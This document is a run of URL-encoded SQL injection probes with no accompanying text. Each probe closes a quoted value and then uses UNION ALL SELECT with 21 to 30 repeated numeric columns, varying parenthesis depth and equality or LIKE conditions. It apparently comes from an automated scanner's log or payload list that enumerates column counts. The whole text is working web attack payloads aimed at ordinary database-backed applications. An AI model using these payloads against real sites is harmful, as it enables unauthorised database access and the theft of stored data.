-5905%22%29%20UNION%20ALL%20SELECT%203568%2C%203568%2C%203568%2C%203568%2C%203568%2C%203568%2C%203568%2C%203568%2C%203568%2C%203568%2C%203568%2C%203568%2C%203568%2C%203568%2C%203568%2C%203568%2C%203568%2C%203568%2C%203568%2C%203568%2C%203568%2C%203568%2C%203568%2C%203568%2C%203568--%20%20AND%20%28%22YMsb%22%3D%22YMsb -3660%22%29%20UNION%20ALL%20SELECT%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598--%20%20AND%20%28%22qRKe%22%3D%22qRKe -5821%22%29%20UNION%20ALL%20SELECT%205550%2C%205550%2C%205550%2C%205550%2C%205550%2C%205550%2C%205550%2C%205550%2C%205550%2C%205550%2C%205550%2C%205550%2C%205550%2C%205550%2C%205550%2C%205550%2C%205550%2C%205550%2C%205550%2C%205550%2C%205550%2C%205550%2C%205550%2C%205550%2C%205550%2C%205550%2C%205550--%20%20AND%20%28%22EJqf%22%3D%22EJqf -3590%22%29%20UNION%20ALL%20SELECT%208440%2C%208440%2C%208440%2C%208440%2C%208440%2C%208440%2C%208440%2C%208440%2C%208440%2C%208440%2C%208440%2C%208440%2C%208440%2C%208440%2C%208440%2C%208440%2C%208440%2C%208440%2C%208440%2C%208440%2C%208440%2C%208440%2C%208440%2C%208440%2C%208440%2C%208440%2C%208440%2C%208440--%20%20AND%20%28%22FnvO%22%3D%22FnvO -2188%22%29%20UNION%20ALL%20SELECT%208507%2C%208507%2C%208507%2C%208507%2C%208507%2C%208507%2C%208507%2C%208507%2C%208507%2C%208507%2C%208507%2C%208507%2C%208507%2C%208507%2C%208507%2C%208507%2C%208507%2C%208507%2C%208507%2C%208507%2C%208507%2C%208507%2C%208507%2C%208507%2C%208507%2C%208507%2C%208507%2C%208507%2C%208507--%20%20AND%20%28%22FnDn%22%3D%22FnDn -2720%22%29%20UNION%20ALL%20SELECT%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227--%20%20AND%20%28%22wrJA%22%3D%22wrJA -3541%22%29%29%20UNION%20ALL%20SELECT%203414%2C%203414%2C%203414%2C%203414%2C%203414%2C%203414%2C%203414%2C%203414%2C%203414%2C%203414%2C%203414%2C%203414%2C%203414%2C%203414%2C%203414%2C%203414%2C%203414%2C%203414%2C%203414%2C%203414%2C%203414--%20%20AND%20%28%28%22WRYO%22%3D%22WRYO -8188%22%29%29%20UNION%20ALL%20SELECT%208042%2C%208042%2C%208042%2C%208042%2C%208042%2C%208042%2C%208042%2C%208042%2C%208042%2C%208042%2C%208042%2C%208042%2C%208042%2C%208042%2C%208042%2C%208042%2C%208042%2C%208042%2C%208042%2C%208042%2C%208042%2C%208042--%20%20AND%20%28%28%22iRpU%22%3D%22iRpU -8610%22%29%29%20UNION%20ALL%20SELECT%203299%2C%203299%2C%203299%2C%203299%2C%203299%2C%203299%2C%203299%2C%203299%2C%203299%2C%203299%2C%203299%2C%203299%2C%203299%2C%203299%2C%203299%2C%203299%2C%203299%2C%203299%2C%203299%2C%203299%2C%203299%2C%203299%2C%203299--%20%20AND%20%28%28%22CuSk%22%3D%22CuSk -7218%22%29%29%20UNION%20ALL%20SELECT%209854%2C%209854%2C%209854%2C%209854%2C%209854%2C%209854%2C%209854%2C%209854%2C%209854%2C%209854%2C%209854%2C%209854%2C%209854%2C%209854%2C%209854%2C%209854%2C%209854%2C%209854%2C%209854%2C%209854%2C%209854%2C%209854%2C%209854%2C%209854--%20%20AND%20%28%28%22dozf%22%3D%22dozf -7920%22%29%29%20UNION%20ALL%20SELECT%208767%2C%208767%2C%208767%2C%208767%2C%208767%2C%208767%2C%208767%2C%208767%2C%208767%2C%208767%2C%208767%2C%208767%2C%208767%2C%208767%2C%208767%2C%208767%2C%208767%2C%208767%2C%208767%2C%208767%2C%208767%2C%208767%2C%208767%2C%208767%2C%208767--%20%20AND%20%28%28%22XdYe%22%3D%22XdYe -3374%22%29%29%20UNION%20ALL%20SELECT%201646%2C%201646%2C%201646%2C%201646%2C%201646%2C%201646%2C%201646%2C%201646%2C%201646%2C%201646%2C%201646%2C%201646%2C%201646%2C%201646%2C%201646%2C%201646%2C%201646%2C%201646%2C%201646%2C%201646%2C%201646%2C%201646%2C%201646%2C%201646%2C%201646%2C%201646--%20%20AND%20%28%28%22CegR%22%3D%22CegR -3390%22%29%29%20UNION%20ALL%20SELECT%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521--%20%20AND%20%28%28%22gWQJ%22%3D%22gWQJ -6405%22%29%29%20UNION%20ALL%20SELECT%206109%2C%206109%2C%206109%2C%206109%2C%206109%2C%206109%2C%206109%2C%206109%2C%206109%2C%206109%2C%206109%2C%206109%2C%206109%2C%206109%2C%206109%2C%206109%2C%206109%2C%206109%2C%206109%2C%206109%2C%206109%2C%206109%2C%206109%2C%206109%2C%206109%2C%206109%2C%206109%2C%206109--%20%20AND%20%28%28%22iEiu%22%3D%22iEiu -5752%22%29%29%20UNION%20ALL%20SELECT%203258%2C%203258%2C%203258%2C%203258%2C%203258%2C%203258%2C%203258%2C%203258%2C%203258%2C%203258%2C%203258%2C%203258%2C%203258%2C%203258%2C%203258%2C%203258%2C%203258%2C%203258%2C%203258%2C%203258%2C%203258%2C%203258%2C%203258%2C%203258%2C%203258%2C%203258%2C%203258%2C%203258%2C%203258--%20%20AND%20%28%28%22dTCl%22%3D%22dTCl -2050%22%29%29%20UNION%20ALL%20SELECT%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304--%20%20AND%20%28%28%22zKsX%22%3D%22zKsX -2300%22%29%29%29%20UNION%20ALL%20SELECT%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150--%20%20AND%20%28%28%28%22qfKf%22%3D%22qfKf -8316%22%29%29%29%20UNION%20ALL%20SELECT%209482%2C%209482%2C%209482%2C%209482%2C%209482%2C%209482%2C%209482%2C%209482%2C%209482%2C%209482%2C%209482%2C%209482%2C%209482%2C%209482%2C%209482%2C%209482%2C%209482%2C%209482%2C%209482%2C%209482%2C%209482%2C%209482--%20%20AND%20%28%28%28%22YuUM%22%3D%22YuUM -5468%22%29%29%29%20UNION%20ALL%20SELECT%206128%2C%206128%2C%206128%2C%206128%2C%206128%2C%206128%2C%206128%2C%206128%2C%206128%2C%206128%2C%206128%2C%206128%2C%206128%2C%206128%2C%206128%2C%206128%2C%206128%2C%206128%2C%206128%2C%206128%2C%206128%2C%206128%2C%206128--%20%20AND%20%28%28%28%22omgP%22%3D%22omgP -3749%22%29%29%29%20UNION%20ALL%20SELECT%209939%2C%209939%2C%209939%2C%209939%2C%209939%2C%209939%2C%209939%2C%209939%2C%209939%2C%209939%2C%209939%2C%209939%2C%209939%2C%209939%2C%209939%2C%209939%2C%209939%2C%209939%2C%209939%2C%209939%2C%209939%2C%209939%2C%209939%2C%209939--%20%20AND%20%28%28%28%22YqnO%22%3D%22YqnO -4705%22%29%29%29%20UNION%20ALL%20SELECT%209842%2C%209842%2C%209842%2C%209842%2C%209842%2C%209842%2C%209842%2C%209842%2C%209842%2C%209842%2C%209842%2C%209842%2C%209842%2C%209842%2C%209842%2C%209842%2C%209842%2C%209842%2C%209842%2C%209842%2C%209842%2C%209842%2C%209842%2C%209842%2C%209842--%20%20AND%20%28%28%28%22axAo%22%3D%22axAo -7924%22%29%29%29%20UNION%20ALL%20SELECT%206091%2C%206091%2C%206091%2C%206091%2C%206091%2C%206091%2C%206091%2C%206091%2C%206091%2C%206091%2C%206091%2C%206091%2C%206091%2C%206091%2C%206091%2C%206091%2C%206091%2C%206091%2C%206091%2C%206091%2C%206091%2C%206091%2C%206091%2C%206091%2C%206091%2C%206091--%20%20AND%20%28%28%28%22NunG%22%3D%22NunG -2402%22%29%29%29%20UNION%20ALL%20SELECT%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590--%20%20AND%20%28%28%28%22kFlf%22%3D%22kFlf -6026%22%29%29%29%20UNION%20ALL%20SELECT%205116%2C%205116%2C%205116%2C%205116%2C%205116%2C%205116%2C%205116%2C%205116%2C%205116%2C%205116%2C%205116%2C%205116%2C%205116%2C%205116%2C%205116%2C%205116%2C%205116%2C%205116%2C%205116%2C%205116%2C%205116%2C%205116%2C%205116%2C%205116%2C%205116%2C%205116%2C%205116%2C%205116--%20%20AND%20%28%28%28%22YPfA%22%3D%22YPfA -7596%22%29%29%29%20UNION%20ALL%20SELECT%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965--%20%20AND%20%28%28%28%22Owpw%22%3D%22Owpw -5215%22%29%29%29%20UNION%20ALL%20SELECT%202575%2C%202575%2C%202575%2C%202575%2C%202575%2C%202575%2C%202575%2C%202575%2C%202575%2C%202575%2C%202575%2C%202575%2C%202575%2C%202575%2C%202575%2C%202575%2C%202575%2C%202575%2C%202575%2C%202575%2C%202575%2C%202575%2C%202575%2C%202575%2C%202575%2C%202575%2C%202575%2C%202575%2C%202575%2C%202575--%20%20AND%20%28%28%28%22zJGu%22%3D%22zJGu -5666%22%20UNION%20ALL%20SELECT%205080%2C%205080%2C%205080%2C%205080%2C%205080%2C%205080%2C%205080%2C%205080%2C%205080%2C%205080%2C%205080%2C%205080%2C%205080%2C%205080%2C%205080%2C%205080%2C%205080%2C%205080%2C%205080%2C%205080%2C%205080--%20%20AND%20%22HGDB%22%3D%22HGDB -1519%22%20UNION%20ALL%20SELECT%201062%2C%201062%2C%201062%2C%201062%2C%201062%2C%201062%2C%201062%2C%201062%2C%201062%2C%201062%2C%201062%2C%201062%2C%201062%2C%201062%2C%201062%2C%201062%2C%201062%2C%201062%2C%201062%2C%201062%2C%201062%2C%201062--%20%20AND%20%22pjpP%22%3D%22pjpP -1627%22%20UNION%20ALL%20SELECT%209803%2C%209803%2C%209803%2C%209803%2C%209803%2C%209803%2C%209803%2C%209803%2C%209803%2C%209803%2C%209803%2C%209803%2C%209803%2C%209803%2C%209803%2C%209803%2C%209803%2C%209803%2C%209803%2C%209803%2C%209803%2C%209803%2C%209803--%20%20AND%20%22kFgD%22%3D%22kFgD -4322%22%20UNION%20ALL%20SELECT%204441%2C%204441%2C%204441%2C%204441%2C%204441%2C%204441%2C%204441%2C%204441%2C%204441%2C%204441%2C%204441%2C%204441%2C%204441%2C%204441%2C%204441%2C%204441%2C%204441%2C%204441%2C%204441%2C%204441%2C%204441%2C%204441%2C%204441%2C%204441--%20%20AND%20%22nyxa%22%3D%22nyxa -9578%22%20UNION%20ALL%20SELECT%201518%2C%201518%2C%201518%2C%201518%2C%201518%2C%201518%2C%201518%2C%201518%2C%201518%2C%201518%2C%201518%2C%201518%2C%201518%2C%201518%2C%201518%2C%201518%2C%201518%2C%201518%2C%201518%2C%201518%2C%201518%2C%201518%2C%201518%2C%201518%2C%201518--%20%20AND%20%22lKas%22%3D%22lKas -6701%22%20UNION%20ALL%20SELECT%207413%2C%207413%2C%207413%2C%207413%2C%207413%2C%207413%2C%207413%2C%207413%2C%207413%2C%207413%2C%207413%2C%207413%2C%207413%2C%207413%2C%207413%2C%207413%2C%207413%2C%207413%2C%207413%2C%207413%2C%207413%2C%207413%2C%207413%2C%207413%2C%207413%2C%207413--%20%20AND%20%22oQnJ%22%3D%22oQnJ -9537%22%20UNION%20ALL%20SELECT%202929%2C%202929%2C%202929%2C%202929%2C%202929%2C%202929%2C%202929%2C%202929%2C%202929%2C%202929%2C%202929%2C%202929%2C%202929%2C%202929%2C%202929%2C%202929%2C%202929%2C%202929%2C%202929%2C%202929%2C%202929%2C%202929%2C%202929%2C%202929%2C%202929%2C%202929%2C%202929--%20%20AND%20%22gYeR%22%3D%22gYeR -6654%22%20UNION%20ALL%20SELECT%204923%2C%204923%2C%204923%2C%204923%2C%204923%2C%204923%2C%204923%2C%204923%2C%204923%2C%204923%2C%204923%2C%204923%2C%204923%2C%204923%2C%204923%2C%204923%2C%204923%2C%204923%2C%204923%2C%204923%2C%204923%2C%204923%2C%204923%2C%204923%2C%204923%2C%204923%2C%204923%2C%204923--%20%20AND%20%22keiu%22%3D%22keiu -9470%22%20UNION%20ALL%20SELECT%201004%2C%201004%2C%201004%2C%201004%2C%201004%2C%201004%2C%201004%2C%201004%2C%201004%2C%201004%2C%201004%2C%201004%2C%201004%2C%201004%2C%201004%2C%201004%2C%201004%2C%201004%2C%201004%2C%201004%2C%201004%2C%201004%2C%201004%2C%201004%2C%201004%2C%201004%2C%201004%2C%201004%2C%201004--%20%20AND%20%22rSeu%22%3D%22rSeu -9020%22%20UNION%20ALL%20SELECT%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920--%20%20AND%20%22MKhL%22%3D%22MKhL -4021%22%29%20UNION%20ALL%20SELECT%206997%2C%206997%2C%206997%2C%206997%2C%206997%2C%206997%2C%206997%2C%206997%2C%206997%2C%206997%2C%206997%2C%206997%2C%206997%2C%206997%2C%206997%2C%206997%2C%206997%2C%206997%2C%206997%2C%206997%2C%206997--%20%20AND%20%28%22WlIp%22%20LIKE%20%22WlIp -6541%22%29%20UNION%20ALL%20SELECT%206540%2C%206540%2C%206540%2C%206540%2C%206540%2C%206540%2C%206540%2C%206540%2C%206540%2C%206540%2C%206540%2C%206540%2C%206540%2C%206540%2C%206540%2C%206540%2C%206540%2C%206540%2C%206540%2C%206540%2C%206540%2C%206540--%20%20AND%20%28%22vxSt%22%20LIKE%20%22vxSt -3496%22%29%20UNION%20ALL%20SELECT%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335--%20%20AND%20%28%22kqLQ%22%20LIKE%20%22kqLQ -3410%22%29%20UNION%20ALL%20SELECT%203289%2C%203289%2C%203289%2C%203289%2C%203289%2C%203289%2C%203289%2C%203289%2C%203289%2C%203289%2C%203289%2C%203289%2C%203289%2C%203289%2C%203289%2C%203289%2C%203289%2C%203289%2C%203289%2C%203289%2C%203289%2C%203289%2C%203289%2C%203289--%20%20AND%20%28%22hWFL%22%20LIKE%20%22hWFL -5279%22%29%20UNION%20ALL%20SELECT%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550--%20%20AND%20%28%22aaUs%22%20LIKE%20%22aaUs -2971%22%29%20UNION%20ALL%20SELECT%203344%2C%203344%2C%203344%2C%203344%2C%203344%2C%203344%2C%203344%2C%203344%2C%203344%2C%203344%2C%203344%2C%203344%2C%203344%2C%203344%2C%203344%2C%203344%2C%203344%2C%203344%2C%203344%2C%203344%2C%203344%2C%203344%2C%203344%2C%203344%2C%203344%2C%203344--%20%20AND%20%28%22kwuQ%22%20LIKE%20%22kwuQ -1468%22%29%20UNION%20ALL%20SELECT%206254%2C%206254%2C%206254%2C%206254%2C%206254%2C%206254%2C%206254%2C%206254%2C%206254%2C%206254%2C%206254%2C%206254%2C%206254%2C%206254%2C%206254%2C%206254%2C%206254%2C%206254%2C%206254%2C%206254%2C%206254%2C%206254%2C%206254%2C%206254%2C%206254%2C%206254%2C%206254--%20%20AND%20%28%22JYwb%22%20LIKE%20%22JYwb -8433%22%29%20UNION%20ALL%20SELECT%202712%2C%202712%2C%202712%2C%202712%2C%202712%2C%202712%2C%202712%2C%202712%2C%202712%2C%202712%2C%202712%2C%202712%2C%202712%2C%202712%2C%202712%2C%202712%2C%202712%2C%202712%2C%202712%2C%202712%2C%202712%2C%202712%2C%202712%2C%202712%2C%202712%2C%202712%2C%202712%2C%202712--%20%20AND%20%28%22bLsj%22%20LIKE%20%22bLsj -4579%22%29%20UNION%20ALL%20SELECT%201496%2C%201496%2C%201496%2C%201496%2C%201496%2C%201496%2C%201496%2C%201496%2C%201496%2C%201496%2C%201496%2C%201496%2C%201496%2C%201496%2C%201496%2C%201496%2C%201496%2C%201496%2C%201496%2C%201496%2C%201496%2C%201496%2C%201496%2C%201496%2C%201496%2C%201496%2C%201496%2C%201496%2C%201496--%20%20AND%20%28%22xhww%22%20LIKE%20%22xhww -5356%22%29%20UNION%20ALL%20SELECT%201382%2C%201382%2C%201382%2C%201382%2C%201382%2C%201382%2C%201382%2C%201382%2C%201382%2C%201382%2C%201382%2C%201382%2C%201382%2C%201382%2C%201382%2C%201382%2C%201382%2C%201382%2C%201382%2C%201382%2C%201382%2C%201382%2C%201382%2C%201382%2C%201382%2C%201382%2C%201382%2C%201382%2C%201382%2C%201382--%20%20AND%20%28%22qcUy%22%20LIKE%20%22qcUy -2966%22%29%29%20UNION%20ALL%20SELECT%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285--%20%20AND%20%28%28%22zvmj%22%20LIKE%20%22zvmj -2277%22%29%29%20UNION%20ALL%20SELECT%203747%2C%203747%2C%203747%2C%203747%2C%203747%2C%203747%2C%203747%2C%203747%2C%203747%2C%203747%2C%203747%2C%203747%2C%203747%2C%203747%2C%203747%2C%203747%2C%203747%2C%203747%2C%203747%2C%203747%2C%203747%2C%203747--%20%20AND%20%28%28%22FuDm%22%20LIKE%20%22FuDm -7170%22%29%29%20UNION%20ALL%20SELECT%203721%2C%203721%2C%203721%2C%203721%2C%203721%2C%203721%2C%203721%2C%203721%2C%203721%2C%203721%2C%203721%2C%203721%2C%203721%2C%203721%2C%203721%2C%203721%2C%203721%2C%203721%2C%203721%2C%203721%2C%203721%2C%203721%2C%203721--%20%20AND%20%28%28%22rJpE%22%20LIKE%20%22rJpE -3772%22%29%29%20UNION%20ALL%20SELECT%207914%2C%207914%2C%207914%2C%207914%2C%207914%2C%207914%2C%207914%2C%207914%2C%207914%2C%207914%2C%207914%2C%207914%2C%207914%2C%207914%2C%207914%2C%207914%2C%207914%2C%207914%2C%207914%2C%207914%2C%207914%2C%207914%2C%207914%2C%207914--%20%20AND%20%28%28%22nLyN%22%20LIKE%20%22nLyN -7854%22%29%29%20UNION%20ALL%20SELECT%206784%2C%206784%2C%206784%2C%206784%2C%206784%2C%206784%2C%206784%2C%206784%2C%206784%2C%206784%2C%206784%2C%206784%2C%206784%2C%206784%2C%206784%2C%206784%2C%206784%2C%206784%2C%206784%2C%206784%2C%206784%2C%206784%2C%206784%2C%206784%2C%206784--%20%20AND%20%28%28%22OgjO%22%20LIKE%20%22OgjO -5464%22%29%29%20UNION%20ALL%20SELECT%203869%2C%203869%2C%203869%2C%203869%2C%203869%2C%203869%2C%203869%2C%203869%2C%203869%2C%203869%2C%203869%2C%203869%2C%203869%2C%203869%2C%203869%2C%203869%2C%203869%2C%203869%2C%203869%2C%203869%2C%203869%2C%203869%2C%203869%2C%203869%2C%203869%2C%203869--%20%20AND%20%28%28%22ozix%22%20LIKE%20%22ozix -4693%22%29%29%20UNION%20ALL%20SELECT%202570%2C%202570%2C%202570%2C%202570%2C%202570%2C%202570%2C%202570%2C%202570%2C%202570%2C%202570%2C%202570%2C%202570%2C%202570%2C%202570%2C%202570%2C%202570%2C%202570%2C%202570%2C%202570%2C%202570%2C%202570%2C%202570%2C%202570%2C%202570%2C%202570%2C%202570%2C%202570--%20%20AND%20%28%28%22pfRl%22%20LIKE%20%22pfRl -2984%22%29%29%20UNION%20ALL%20SELECT%206881%2C%206881%2C%206881%2C%206881%2C%206881%2C%206881%2C%206881%2C%206881%2C%206881%2C%206881%2C%206881%2C%206881%2C%206881%2C%206881%2C%206881%2C%206881%2C%206881%2C%206881%2C%206881%2C%206881%2C%206881%2C%206881%2C%206881%2C%206881%2C%206881%2C%206881%2C%206881%2C%206881--%20%20AND%20%28%28%22PJHp%22%20LIKE%20%22PJHp -6458%22%29%29%20UNION%20ALL%20SELECT%208259%2C%208259%2C%208259%2C%208259%2C%208259%2C%208259%2C%208259%2C%208259%2C%208259%2C%208259%2C%208259%2C%208259%2C%208259%2C%208259%2C%208259%2C%208259%2C%208259%2C%208259%2C%208259%2C%208259%2C%208259%2C%208259%2C%208259%2C%208259%2C%208259%2C%208259%2C%208259%2C%208259%2C%208259--%20%20AND%20%28%28%22JIpX%22%20LIKE%20%22JIpX -2720%22%29%29%20UNION%20ALL%20SELECT%202526%2C%202526%2C%202526%2C%202526%2C%202526%2C%202526%2C%202526%2C%202526%2C%202526%2C%202526%2C%202526%2C%202526%2C%202526%2C%202526%2C%202526%2C%202526%2C%202526%2C%202526%2C%202526%2C%202526%2C%202526%2C%202526%2C%202526%2C%202526%2C%202526%2C%202526%2C%202526%2C%202526%2C%202526%2C%202526--%20%20AND%20%28%28%22ASnq%22%20LIKE%20%22ASnq -5369%22%29%29%29%20UNION%20ALL%20SELECT%205639%2C%205639%2C%205639%2C%205639%2C%205639%2C%205639%2C%205639%2C%205639%2C%205639%2C%205639%2C%205639%2C%205639%2C%205639%2C%205639%2C%205639%2C%205639%2C%205639%2C%205639%2C%205639%2C%205639%2C%205639--%20%20AND%20%28%28%28%22OIzX%22%20LIKE%20%22OIzX -1068%22%29%29%29%20UNION%20ALL%20SELECT%205048%2C%205048%2C%205048%2C%205048%2C%205048%2C%205048%2C%205048%2C%205048%2C%205048%2C%205048%2C%205048%2C%205048%2C%205048%2C%205048%2C%205048%2C%205048%2C%205048%2C%205048%2C%205048%2C%205048%2C%205048%2C%205048--%20%20AND%20%28%28%28%22XmOI%22%20LIKE%20%22XmOI -3855%22%29%29%29%20UNION%20ALL%20SELECT%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311--%20%20AND%20%28%28%28%22IHEP%22%20LIKE%20%22IHEP -4912%22%29%29%29%20UNION%20ALL%20SELECT%201985%2C%201985%2C%201985%2C%201985%2C%201985%2C%201985%2C%201985%2C%201985%2C%201985%2C%201985%2C%201985%2C%201985%2C%201985%2C%201985%2C%201985%2C%201985%2C%201985%2C%201985%2C%201985%2C%201985%2C%201985%2C%201985%2C%201985%2C%201985--%20%20AND%20%28%28%28%22REYx%22%20LIKE%20%22REYx -2138%22%29%29%29%20UNION%20ALL%20SELECT%208433%2C%208433%2C%208433%2C%208433%2C%208433%2C%208433%2C%208433%2C%208433%2C%208433%2C%208433%2C%208433%2C%208433%2C%208433%2C%208433%2C%208433%2C%208433%2C%208433%2C%208433%2C%208433%2C%208433%2C%208433%2C%208433%2C%208433%2C%208433%2C%208433--%20%20AND%20%28%28%28%22kZEP%22%20LIKE%20%22kZEP -9033%22%29%29%29%20UNION%20ALL%20SELECT%204500%2C%204500%2C%204500%2C%204500%2C%204500%2C%204500%2C%204500%2C%204500%2C%204500%2C%204500%2C%204500%2C%204500%2C%204500%2C%204500%2C%204500%2C%204500%2C%204500%2C%204500%2C%204500%2C%204500%2C%204500%2C%204500%2C%204500%2C%204500%2C%204500%2C%204500--%20%20AND%20%28%28%28%22NTww%22%20LIKE%20%22NTww -8798%22%29%29%29%20UNION%20ALL%20SELECT%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286--%20%20AND%20%28%28%28%22WpcJ%22%20LIKE%20%22WpcJ -5621%22%29%29%29%20UNION%20ALL%20SELECT%202758%2C%202758%2C%202758%2C%202758%2C%202758%2C%202758%2C%202758%2C%202758%2C%202758%2C%202758%2C%202758%2C%202758%2C%202758%2C%202758%2C%202758%2C%202758%2C%202758%2C%202758%2C%202758%2C%202758%2C%202758%2C%202758%2C%202758%2C%202758%2C%202758%2C%202758%2C%202758%2C%202758--%20%20AND%20%28%28%28%22twcK%22%20LIKE%20%22twcK -2759%22%29%29%29%20UNION%20ALL%20SELECT%206862%2C%206862%2C%206862%2C%206862%2C%206862%2C%206862%2C%206862%2C%206862%2C%206862%2C%206862%2C%206862%2C%206862%2C%206862%2C%206862%2C%206862%2C%206862%2C%206862%2C%206862%2C%206862%2C%206862%2C%206862%2C%206862%2C%206862%2C%206862%2C%206862%2C%206862%2C%206862%2C%206862%2C%206862--%20%20AND%20%28%28%28%22GUVj%22%20LIKE%20%22GUVj -6913%22%29%29%29%20UNION%20ALL%20SELECT%207274%2C%207274%2C%207274%2C%207274%2C%207274%2C%207274%2C%207274%2C%207274%2C%207274%2C%207274%2C%207274%2C%207274%2C%207274%2C%207274%2C%207274%2C%207274%2C%207274%2C%207274%2C%207274%2C%207274%2C%207274%2C%207274%2C%207274%2C%207274%2C%207274%2C%207274%2C%207274%2C%207274%2C%207274%2C%207274--%20%20AND%20%28%28%28%22SwcL%22%20LIKE%20%22SwcL -4745%22%20UNION%20ALL%20SELECT%209770%2C%209770%2C%209770%2C%209770%2C%209770%2C%209770%2C%209770%2C%209770%2C%209770%2C%209770%2C%209770%2C%209770%2C%209770%2C%209770%2C%209770%2C%209770%2C%209770%2C%209770%2C%209770%2C%209770%2C%209770--%20%20AND%20%22KsHJ%22%20LIKE%20%22KsHJ -8995%22%20UNION%20ALL%20SELECT%204186%2C%204186%2C%204186%2C%204186%2C%204186%2C%204186%2C%204186%2C%204186%2C%204186%2C%204186%2C%204186%2C%204186%2C%204186%2C%204186%2C%204186%2C%204186%2C%204186%2C%204186%2C%204186%2C%204186%2C%204186%2C%204186--%20%20AND%20%22oOEJ%22%20LIKE%20%22oOEJ -2437%22%20UNION%20ALL%20SELECT%209843%2C%209843%2C%209843%2C%209843%2C%209843%2C%209843%2C%209843%2C%209843%2C%209843%2C%209843%2C%209843%2C%209843%2C%209843%2C%209843%2C%209843%2C%209843%2C%209843%2C%209843%2C%209843%2C%209843%2C%209843%2C%209843%2C%209843--%20%20AND%20%22KAvl%22%20LIKE%20%22KAvl -5382%22%20UNION%20ALL%20SELECT%203205%2C%203205%2C%203205%2C%203205%2C%203205%2C%203205%2C%203205%2C%203205%2C%203205%2C%203205%2C%203205%2C%203205%2C%203205%2C%203205%2C%203205%2C%203205%2C%203205%2C%203205%2C%203205%2C%203205%2C%203205%2C%203205%2C%203205%2C%203205--%20%20AND%20%22gmWj%22%20LIKE%20%22gmWj -5908%22%20UNION%20ALL%20SELECT%202623%2C%202623%2C%202623%2C%202623%2C%202623%2C%202623%2C%202623%2C%202623%2C%202623%2C%202623%2C%202623%2C%202623%2C%202623%2C%202623%2C%202623%2C%202623%2C%202623%2C%202623%2C%202623%2C%202623%2C%202623%2C%202623%2C%202623%2C%202623%2C%202623--%20%20AND%20%22phqR%22%20LIKE%20%22phqR -3384%22%20UNION%20ALL%20SELECT%208179%2C%208179%2C%208179%2C%208179%2C%208179%2C%208179%2C%208179%2C%208179%2C%208179%2C%208179%2C%208179%2C%208179%2C%208179%2C%208179%2C%208179%2C%208179%2C%208179%2C%208179%2C%208179%2C%208179%2C%208179%2C%208179%2C%208179%2C%208179%2C%208179%2C%208179--%20%20AND%20%22Ycer%22%20LIKE%20%22Ycer 